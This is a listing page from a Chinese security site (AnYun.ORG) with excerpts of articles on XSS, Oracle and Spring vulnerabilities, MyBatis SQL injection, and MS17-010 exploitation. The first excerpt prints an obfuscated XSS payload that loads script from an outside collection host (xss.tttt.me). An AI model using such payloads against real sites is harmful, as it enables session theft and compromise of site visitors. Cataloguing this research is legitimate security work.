安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
邮箱安全 漏洞分享
返回首页
当前位置: 安云网 > 技术关注 > 网络安全 >
  • [网络安全] xss构造 日期::2017-07-10点击:133 好评:0

    svg/onload=s=createElement(script);body.appendChild(s);s.src=url; body/onpageshow=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.tttt.me%2FneKXvH%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName...

  • [网络安全] XSS 绕过过滤器大全 日期::2017-06-16点击:175 好评:0

    XSS Filter Evasion Cheat Sheet 介绍(Introduction): 翻译:落泪红尘 r00ts www.sh3llc0de.com 翻译了一点,有时间再全部翻译 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 这篇文章是协助应用程序安全专业人...

  • [漏洞分享] Oracle数据库漏洞分析:CVE-2012-1675和CVE-2012-3137 日期::2017-06-06点击:146 好评:0

    摘要 一般性的 数据库 漏洞,都是在成功连接或登录数据库后实现入侵;本文介绍两个在2012年暴露的 Oracle 漏洞,通过这两种漏洞的结合,可以在不掌握用户名/密码的情况下入侵Oracle,从而完...

  • [漏洞分享] Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法, 日期::2017-06-06点击:166 好评:0

    环境:Windows 2008 R2 + Oracle 10.2.0.3 应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server TNS Listener远程数据投毒漏洞(CVE-2012-1675) •1.确定解决方案 •2.应用解决方案 •3.验证修补情况 •4.Reference 1.确定解决方案 安全厂家给出...

  • [漏洞分享] Spring framework(cve-2010-1622)漏洞利用指南 日期::2017-06-02点击:157 好评:0

    摘要 这个 漏洞 在2010年出的,当时由于环境问题,并没有找到稳定利用的EXP。作者对spring mvc框架不熟悉,很多地方不了解,结果研究了一半,证明了漏洞的部分严重性就放下了,没有弄出POC来。最近同事也想研究下,勾起了研究...

  • [网络安全] 实战SpringMVC+Mybatis搭建高性能安全站点 日期::2017-06-02点击:177 好评:0

    最近公司后端程序员缺乏,我这个前端冒死受命玩起了JavaEE项目,借助开源的力量( spring-shiro-training )搭建了一个JavaEE项目,经过改造成符合我们需要,主要是数据库结构改动,下面简单记录一下Spring+MyBatis项目的一些玩法。 一...

  • [网络安全] Mybatis框架下SQL注入漏洞处理 日期::2017-06-02点击:76 好评:0

    来源:http://www.open-open.com/lib/view/open1474963603800.html http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==mid=2727827368idx=1sn=765d0835f0069b5145523c31e8229850mpshare=1scene=1srcid=0926iDLkz6CKTO9IUh5fqt3o#rd 一、SQL注入漏洞基本原理 在常见的web漏洞中,SQL注入漏洞较为常...

  • [网络安全] 审计mybatis的SQL注入 日期::2017-06-02点击:66 好评:0

    mybatis 概述 MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架。MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集。MyBatis 可以对配置和原生Map使用简单的 XML 或注解,将接口和 Java 的 POJOs(Plain Ol...

  • [网络安全] ms17-010 exp复现 日期::2017-05-25点击:128 好评:0

    前言 Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。 0x00 创建wine kali 64位 kali 64位需要兼容32位环境才可以使...

  • [网络安全] MS17-010漏洞检测与内网穿透技术的应用 日期::2017-05-16点击:95 好评:0

    http://www.tuicool.com/articles/MbmmaaY 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条...

  • 首页
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 下一页
  • 末页
  • 58573